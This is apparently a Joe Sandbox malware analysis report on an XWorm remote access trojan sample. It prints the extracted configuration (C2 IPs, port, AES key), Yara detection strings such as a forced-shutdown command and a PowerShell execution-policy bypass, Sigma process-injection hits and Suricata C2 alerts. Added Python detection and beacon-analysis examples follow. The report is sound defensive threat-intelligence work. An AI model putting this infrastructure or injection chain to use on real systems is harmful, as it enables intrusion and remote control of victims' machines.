
Windows Analysis Report
fg.exe

Overview

General Information

Sample name: fg.exe
Analysis ID: 1632841
MD5: 570bc151bf5d20eea56d4ad306344238
SHA1: 277af0f90afaa930f065b5d72a7fb06739031157
SHA256: 1be3f3449a4fbe09203249d212c1abe8aead0d3e3ad9c499f0c0e9aaa76f198a
Tags: 185-7-214-54, AsyncRAT, booking, ClickFix, exe, FakeCaptcha, user-JAMESWT_MHT

Detection

XWorm
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
.NET source code contains very large array initializations
.NET source code contains very large strings
.NET source code references suspicious native API functions
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Compiles code for process injection (via .Net compiler)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found large amount of non-executed APIs
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
One or more processes crash
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • fg.exe (PID: 7816 cmdline: "C:\Users\user\Desktop\fg.exe" MD5: 570BC151BF5D20EEA56D4AD306344238)
    • csc.exe (PID: 6364 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
      • conhost.exe (PID: 6344 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 408 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES9651.tmp" "c:\Users\user\AppData\Local\Temp\cy31atwy\CSC8910777A3B084AE58CA4772E6114D41.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
    • MSBuild.exe (PID: 3708 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • MSBuild.exe (PID: 516 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
      • WerFault.exe (PID: 7228 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 516 -s 1668 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • conhost.exe (PID: 3708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Malware configuration (extracted): {"C2 url": ["185.7.214.108", "185.7.214.54"], "Port": 4411, "Aes key": "P0WER", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
Yara matches in dropped files:
Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.dll | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.dll | rat_win_xworm_v3 | Finds XWorm (version XClient, v3) samples based on characteristic strings | Sekoia.io
  • 0x5ea9:$str01: $VB$Local_Port
  • 0x5e9a:$str02: $VB$Local_Host
  • 0x61a0:$str03: get_Jpeg
  • 0x5b52:$str04: get_ServicePack
  • 0x6b6e:$str05: Select * from AntivirusProduct
  • 0x6d6c:$str06: PCRestart
  • 0x6d80:$str07: shutdown.exe /f /r /t 0
  • 0x6e32:$str08: StopReport
  • 0x6e08:$str09: StopDDos
  • 0x6efe:$str10: sendPlugin
  • 0x6f7e:$str11: OfflineKeylogger Not Enabled
  • 0x70d6:$str12: -ExecutionPolicy Bypass -File "
  • 0x71ff:$str13: Content-length: 5235
C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.dll | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x72a8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x7345:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x745a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x711a:$cnc4: POST / HTTP/1.1

Yara matches in memory dumps:
Source | Rule | Description | Author | Strings
0000000C.00000002.2856627707.0000000000402000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
0000000C.00000002.2856627707.0000000000402000.00000040.00000400.00020000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x6aa8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x6b45:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x6c5a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x691a:$cnc4: POST / HTTP/1.1
00000004.00000002.1403846856.0000000005150000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
00000004.00000002.1403846856.0000000005150000.00000004.08000000.00040000.00000000.sdmp | rat_win_xworm_v3 | Finds XWorm (version XClient, v3) samples based on characteristic strings | Sekoia.io
  • 0x5ea9:$str01: $VB$Local_Port
  • 0x5e9a:$str02: $VB$Local_Host
  • 0x61a0:$str03: get_Jpeg
  • 0x5b52:$str04: get_ServicePack
  • 0x6b6e:$str05: Select * from AntivirusProduct
  • 0x6d6c:$str06: PCRestart
  • 0x6d80:$str07: shutdown.exe /f /r /t 0
  • 0x6e32:$str08: StopReport
  • 0x6e08:$str09: StopDDos
  • 0x6efe:$str10: sendPlugin
  • 0x6f7e:$str11: OfflineKeylogger Not Enabled
  • 0x70d6:$str12: -ExecutionPolicy Bypass -File "
  • 0x71ff:$str13: Content-length: 5235
00000004.00000002.1403846856.0000000005150000.00000004.08000000.00040000.00000000.sdmp | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x72a8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x7345:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x745a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x711a:$cnc4: POST / HTTP/1.1
[15 entries in this table; the remaining entries are not shown here]

Yara matches in unpacked PEs:
Source | Rule | Description | Author | Strings
8.3.csc.exe.9dbdf0.1.raw.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
8.3.csc.exe.9dbdf0.1.raw.unpack | rat_win_xworm_v3 | Finds XWorm (version XClient, v3) samples based on characteristic strings | Sekoia.io
  • 0x58a9:$str01: $VB$Local_Port
  • 0x589a:$str02: $VB$Local_Host
  • 0x5ba0:$str03: get_Jpeg
  • 0x5552:$str04: get_ServicePack
  • 0x656e:$str05: Select * from AntivirusProduct
  • 0x676c:$str06: PCRestart
  • 0x6780:$str07: shutdown.exe /f /r /t 0
  • 0x6832:$str08: StopReport
  • 0x6808:$str09: StopDDos
  • 0x68fe:$str10: sendPlugin
  • 0x697e:$str11: OfflineKeylogger Not Enabled
  • 0x6ad6:$str12: -ExecutionPolicy Bypass -File "
  • 0x6bff:$str13: Content-length: 5235
8.3.csc.exe.9dbdf0.1.raw.unpack | MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen
  • 0x6ca8:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
  • 0x6d45:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
  • 0x6e5a:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
  • 0x6b1a:$cnc4: POST / HTTP/1.1
8.3.csc.exe.9dbdf0.2.raw.unpack | JoeSecurity_XWorm | Yara detected XWorm | Joe Security
8.3.csc.exe.9dbdf0.2.raw.unpack | rat_win_xworm_v3 | Finds XWorm (version XClient, v3) samples based on characteristic strings | Sekoia.io
  • 0x58a9:$str01: $VB$Local_Port
  • 0x589a:$str02: $VB$Local_Host
  • 0x5ba0:$str03: get_Jpeg
  • 0x5552:$str04: get_ServicePack
  • 0x656e:$str05: Select * from AntivirusProduct
  • 0x676c:$str06: PCRestart
  • 0x6780:$str07: shutdown.exe /f /r /t 0
  • 0x6832:$str08: StopReport
  • 0x6808:$str09: StopDDos
  • 0x68fe:$str10: sendPlugin
  • 0x697e:$str11: OfflineKeylogger Not Enabled
  • 0x6ad6:$str12: -ExecutionPolicy Bypass -File "
  • 0x6bff:$str13: Content-length: 5235
[37 entries in this table; the remaining entries are not shown here]

            System Summary

Source: Process started; Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems); Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\fg.exe", ParentImage: C:\Users\user\Desktop\fg.exe, ParentProcessId: 7816, ParentProcessName: fg.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.cmdline", ProcessId: 6364, ProcessName: csc.exe
Source: File created; Author: frack113; Data: EventID: 11, Image: C:\Users\user\Desktop\fg.exe, ProcessId: 7816, TargetFilename: C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.cmdline
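The two Sigma hits above and the process tree describe one chain: fg.exe on the Desktop writes a csc.exe response file (*.cmdline) to Temp, has csc.exe compile it, then starts argument-less MSBuild.exe children that end up holding the XWorm code (the XWorm Yara hits are in MSBuild.exe memory dumps). As an added example that is not part of the Joe Sandbox report or of the Sigma rules it cites, the Python below re-implements that logic as plain checks over constructed Sysmon-style events. The PIDs, images and command lines are copied from the report; the explorer.exe parent of fg.exe, the benign control event, the suspicious-directory list and the build-tool parent allow-list are assumptions.

```python
"""Added example (not from the Joe Sandbox report): re-implements the detection
logic behind the csc.exe / .cmdline / MSBuild.exe chain as plain Python checks and
runs them over constructed Sysmon-style events (EventID 1 = process create,
EventID 11 = file create)."""
import re
from typing import Callable, Dict, List, Tuple

Event = Dict[str, str]

# Constructed events. PIDs, images and command lines are copied from the report's
# process tree and Sigma hits; the explorer.exe parent and the last (benign control)
# event, Visual Studio's MSBuild driving csc.exe on a project tree, are assumptions.
EVENTS: List[Event] = [
    {"EventID": "1", "ProcessId": "7816", "Image": r"C:\Users\user\Desktop\fg.exe",
     "CommandLine": r'"C:\Users\user\Desktop\fg.exe"',
     "ParentImage": r"C:\Windows\explorer.exe"},
    {"EventID": "11", "ProcessId": "7816", "Image": r"C:\Users\user\Desktop\fg.exe",
     "TargetFilename": r"C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.cmdline"},
    {"EventID": "1", "ProcessId": "6364",
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths '
                    r'@"C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.cmdline"',
     "ParentImage": r"C:\Users\user\Desktop\fg.exe"},
    {"EventID": "1", "ProcessId": "516",
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"',
     "ParentImage": r"C:\Users\user\Desktop\fg.exe"},
    {"EventID": "1", "ProcessId": "9001",
     "Image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe",
     "CommandLine": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig '
                    r'@"C:\Users\user\source\repos\App\obj\Debug\App.cmdline"',
     "ParentImage": r"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe"},
]

# Assumed lists: user-writable drop directories and parents that legitimately drive the compilers.
SUSPICIOUS_DIRS = ("\\appdata\\local\\temp\\", "\\appdata\\roaming\\", "\\users\\public\\",
                   "\\programdata\\", "\\windows\\temp\\")
BUILD_PARENTS = ("msbuild.exe", "devenv.exe", "vbcscompiler.exe", "dotnet.exe")


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def in_suspicious_dir(path: str) -> bool:
    return any(d in path.lower() for d in SUSPICIOUS_DIRS)


def csc_response_file_in_temp(ev: Event) -> bool:
    """csc.exe whose @response file lives in a user-writable temp directory
    (approximates 'Dot net compiler compiles file from suspicious location')."""
    if ev.get("EventID") != "1" or basename(ev.get("Image", "")) != "csc.exe":
        return False
    m = re.search(r'@"?([^"\s]+\.cmdline)', ev.get("CommandLine", ""), re.IGNORECASE)
    return bool(m) and in_suspicious_dir(m.group(1))


def csc_unusual_parent(ev: Event) -> bool:
    """csc.exe started by something other than a build tool, here an unsigned
    binary on the Desktop (approximates 'Dynamic .NET Compilation Via Csc.EXE')."""
    return (ev.get("EventID") == "1" and basename(ev.get("Image", "")) == "csc.exe"
            and basename(ev.get("ParentImage", "")) not in BUILD_PARENTS)


def cmdline_file_dropped_in_temp(ev: Event) -> bool:
    """File-create of a *.cmdline response file under a temp directory by a
    non-build process: the precursor of the csc.exe launch (the EventID 11 hit)."""
    tgt = ev.get("TargetFilename", "")
    return (ev.get("EventID") == "11" and tgt.lower().endswith(".cmdline")
            and in_suspicious_dir(tgt) and basename(ev.get("Image", "")) not in BUILD_PARENTS)


def bare_msbuild_child(ev: Event) -> bool:
    """MSBuild.exe started with no arguments by a non-build parent: there is nothing
    to build, so the process only serves as a host for injected code."""
    if ev.get("EventID") != "1" or basename(ev.get("Image", "")) != "msbuild.exe":
        return False
    args = ev.get("CommandLine", "").strip().strip('"')
    return args.lower().endswith("msbuild.exe") and basename(ev.get("ParentImage", "")) not in BUILD_PARENTS


RULES: Dict[str, Callable[[Event], bool]] = {
    "csc_response_file_in_temp": csc_response_file_in_temp,
    "csc_unusual_parent": csc_unusual_parent,
    "cmdline_file_dropped_in_temp": cmdline_file_dropped_in_temp,
    "bare_msbuild_child": bare_msbuild_child,
}


def evaluate(events: List[Event]) -> List[Tuple[str, str]]:
    """Return (rule name, ProcessId) for every event that trips a rule, in event order."""
    return [(name, ev.get("ProcessId", "")) for ev in events for name, fn in RULES.items() if fn(ev)]


if __name__ == "__main__":
    for rule, pid in evaluate(EVENTS):
        print(f"{rule:32s} PID {pid}")
```

On the constructed events the four rules fire on PIDs 7816, 6364 (twice) and 516 and stay quiet on the Visual Studio control. The published Sigma rules carry more parent and path filters than these sketches; the point here is that the .cmdline file write, the csc.exe launch and the bare MSBuild.exe child can each be caught on its own, and correlating them on the parent PID (7816) gives the whole chain.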

            Data Obfuscation

Source: Process started; Author: Joe Security; Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\fg.exe", ParentImage: C:\Users\user\Desktop\fg.exe, ParentProcessId: 7816, ParentProcessName: fg.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\cy31atwy\cy31atwy.cmdline", ProcessId: 6364, ProcessName: csc.exe
Suricata alerts, SID 2852870 (ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes):
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-09T09:54:41.137968+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.7.214.108 | 4411 | 192.168.2.4 | 49717 | TCP
2025-03-09T09:54:49.103771+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.7.214.108 | 4411 | 192.168.2.4 | 49717 | TCP
2025-03-09T09:54:59.846599+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.7.214.108 | 4411 | 192.168.2.4 | 49717 | TCP
2025-03-09T09:55:10.597041+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.7.214.108 | 4411 | 192.168.2.4 | 49717 | TCP
2025-03-09T09:55:11.136563+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.7.214.108 | 4411 | 192.168.2.4 | 49717 | TCP
2025-03-09T09:55:11.370497+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.7.214.108 | 4411 | 192.168.2.4 | 49717 | TCP
2025-03-09T09:55:21.346909+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.7.214.108 | 4411 | 192.168.2.4 | 49717 | TCP
2025-03-09T09:55:32.097952+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.7.214.108 | 4411 | 192.168.2.4 | 49717 | TCP
2025-03-09T09:55:41.127095+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.7.214.108 | 4411 | 192.168.2.4 | 49717 | TCP
2025-03-09T09:55:42.851272+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.7.214.108 | 4411 | 192.168.2.4 | 49717 | TCP
2025-03-09T09:55:53.596428+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.7.214.108 | 4411 | 192.168.2.4 | 49717 | TCP
2025-03-09T09:55:59.800623+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.7.214.108 | 4411 | 192.168.2.4 | 49717 | TCP
2025-03-09T09:56:10.550168+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.7.214.108 | 4411 | 192.168.2.4 | 49717 | TCP
2025-03-09T09:56:11.138705+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.7.214.108 | 4411 | 192.168.2.4 | 49717 | TCP
2025-03-09T09:56:12.325511+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.7.214.108 | 4411 | 192.168.2.4 | 49717 | TCP
2025-03-09T09:56:17.800251+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.7.214.108 | 4411 | 192.168.2.4 | 49717 | TCP
2025-03-09T09:56:21.253060+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.7.214.108 | 4411 | 192.168.2.4 | 49717 | TCP
2025-03-09T09:56:21.378089+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.7.214.108 | 4411 | 192.168.2.4 | 49717 | TCP
2025-03-09T09:56:21.503002+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.7.214.108 | 4411 | 192.168.2.4 | 49717 | TCP
2025-03-09T09:56:21.628207+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.7.214.108 | 4411 | 192.168.2.4 | 49717 | TCP
2025-03-09T09:56:32.299997+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.7.214.108 | 4411 | 192.168.2.4 | 49717 | TCP
2025-03-09T09:56:41.137735+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.7.214.108 | 4411 | 192.168.2.4 | 49717 | TCP
2025-03-09T09:56:42.512892+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.7.214.108 | 4411 | 192.168.2.4 | 49717 | TCP
2025-03-09T09:56:42.682498+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.7.214.108 | 4411 | 192.168.2.4 | 49717 | TCP
2025-03-09T09:56:46.213505+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.7.214.108 | 4411 | 192.168.2.4 | 49717 | TCP
2025-03-09T09:56:47.816066+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.7.214.108 | 4411 | 192.168.2.4 | 49717 | TCP
2025-03-09T09:57:00.497485+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 185.7.214.108 | 4411 | 192.168.2.4 | 49717 | TCP

Suricata alerts, SID 2852923 (ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)):
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-09T09:54:49.106070+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49717 | 185.7.214.108 | 4411 | TCP
2025-03-09T09:54:59.849214+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49717 | 185.7.214.108 | 4411 | TCP
2025-03-09T09:55:10.598954+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49717 | 185.7.214.108 | 4411 | TCP
2025-03-09T09:55:21.349433+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49717 | 185.7.214.108 | 4411 | TCP
2025-03-09T09:55:32.099808+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49717 | 185.7.214.108 | 4411 | TCP
2025-03-09T09:55:42.853323+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49717 | 185.7.214.108 | 4411 | TCP
2025-03-09T09:55:53.597859+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49717 | 185.7.214.108 | 4411 | TCP
2025-03-09T09:55:59.803404+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49717 | 185.7.214.108 | 4411 | TCP
2025-03-09T09:56:10.552329+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49717 | 185.7.214.108 | 4411 | TCP
2025-03-09T09:56:12.332358+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49717 | 185.7.214.108 | 4411 | TCP
2025-03-09T09:56:17.802707+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49717 | 185.7.214.108 | 4411 | TCP
2025-03-09T09:56:21.255206+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49717 | 185.7.214.108 | 4411 | TCP
2025-03-09T09:56:21.379723+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49717 | 185.7.214.108 | 4411 | TCP
2025-03-09T09:56:21.519062+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49717 | 185.7.214.108 | 4411 | TCP
2025-03-09T09:56:21.629911+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49717 | 185.7.214.108 | 4411 | TCP
2025-03-09T09:56:32.311152+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49717 | 185.7.214.108 | 4411 | TCP
2025-03-09T09:56:42.516423+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49717 | 185.7.214.108 | 4411 | TCP
2025-03-09T09:56:42.684479+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49717 | 185.7.214.108 | 4411 | TCP
2025-03-09T09:56:46.215487+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49717 | 185.7.214.108 | 4411 | TCP
2025-03-09T09:56:47.818411+0100 | 2852923 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49717 | 185.7.214.108 | 4411 | TCP

Suricata alerts, SID 2858801 (ETPRO MALWARE Win32/XWorm CnC Command - Ping Inbound):
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-09T09:54:41.137968+0100 | 2858801 | 1 | Malware Command and Control Activity Detected | 185.7.214.108 | 4411 | 192.168.2.4 | 49717 | TCP

Suricata alerts, SID 2858800 (ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound):
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-09T09:54:48.882992+0100 | 2858800 | 1 | Malware Command and Control Activity Detected | 192.168.2.4 | 49717 | 185.7.214.108 | 4411 | TCP
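Read top to bottom, the client check-in alerts arrive about every 10.75 seconds with short bursts in between. As an added example that is not part of the Joe Sandbox report, the Python below turns those timestamps into a beacon profile of the kind an analyst would pull from IDS or NetFlow data: the dominant inter-arrival interval, how much of the traffic sits on it, and which alerts fall off the cadence. The timestamps are copied from the SID 2852923 table; the whole-second bucketing and the ±10% tolerance are assumptions.

```python
"""Added example (not part of the Joe Sandbox report): beacon-cadence analysis of the
outbound XWorm check-in alerts (SID 2852923) listed in the report."""
from datetime import datetime
from statistics import median
from typing import Dict, List

# Timestamps copied from the SID 2852923 table (192.168.2.4:49717 -> 185.7.214.108:4411).
CLIENT_CHECKINS: List[str] = [
    "2025-03-09T09:54:49.106070+0100", "2025-03-09T09:54:59.849214+0100",
    "2025-03-09T09:55:10.598954+0100", "2025-03-09T09:55:21.349433+0100",
    "2025-03-09T09:55:32.099808+0100", "2025-03-09T09:55:42.853323+0100",
    "2025-03-09T09:55:53.597859+0100", "2025-03-09T09:55:59.803404+0100",
    "2025-03-09T09:56:10.552329+0100", "2025-03-09T09:56:12.332358+0100",
    "2025-03-09T09:56:17.802707+0100", "2025-03-09T09:56:21.255206+0100",
    "2025-03-09T09:56:21.379723+0100", "2025-03-09T09:56:21.519062+0100",
    "2025-03-09T09:56:21.629911+0100", "2025-03-09T09:56:32.311152+0100",
    "2025-03-09T09:56:42.516423+0100", "2025-03-09T09:56:42.684479+0100",
    "2025-03-09T09:56:46.215487+0100", "2025-03-09T09:56:47.818411+0100",
]


def parse_ts(ts: str) -> datetime:
    # Joe Sandbox prints Suricata times as 2025-03-09T09:54:49.106070+0100; %z accepts "+0100".
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z")


def inter_arrival_gaps(timestamps: List[str]) -> List[float]:
    """Seconds between consecutive alerts, in time order."""
    times = sorted(parse_ts(t) for t in timestamps)
    return [(b - a).total_seconds() for a, b in zip(times, times[1:])]


def beacon_profile(timestamps: List[str], tolerance: float = 0.10) -> Dict[str, float]:
    """Dominant inter-arrival interval and the share of gaps that sit on it.
    Gaps are bucketed to whole seconds (assumed granularity); the median of the
    fullest bucket is taken as the period, and a gap counts as on-cadence when it
    lies within +/- tolerance of that period."""
    gaps = inter_arrival_gaps(timestamps)
    buckets: Dict[int, List[float]] = {}
    for g in gaps:
        buckets.setdefault(int(g), []).append(g)
    period = median(max(buckets.values(), key=len))
    lo, hi = period * (1 - tolerance), period * (1 + tolerance)
    on_cadence = sum(1 for g in gaps if lo <= g <= hi)
    return {
        "alerts": len(timestamps),
        "gaps": len(gaps),
        "period_s": round(period, 3),
        "on_cadence": on_cadence,
        "on_cadence_share": round(on_cadence / len(gaps), 3),
        "span_s": round(sum(gaps), 3),
    }


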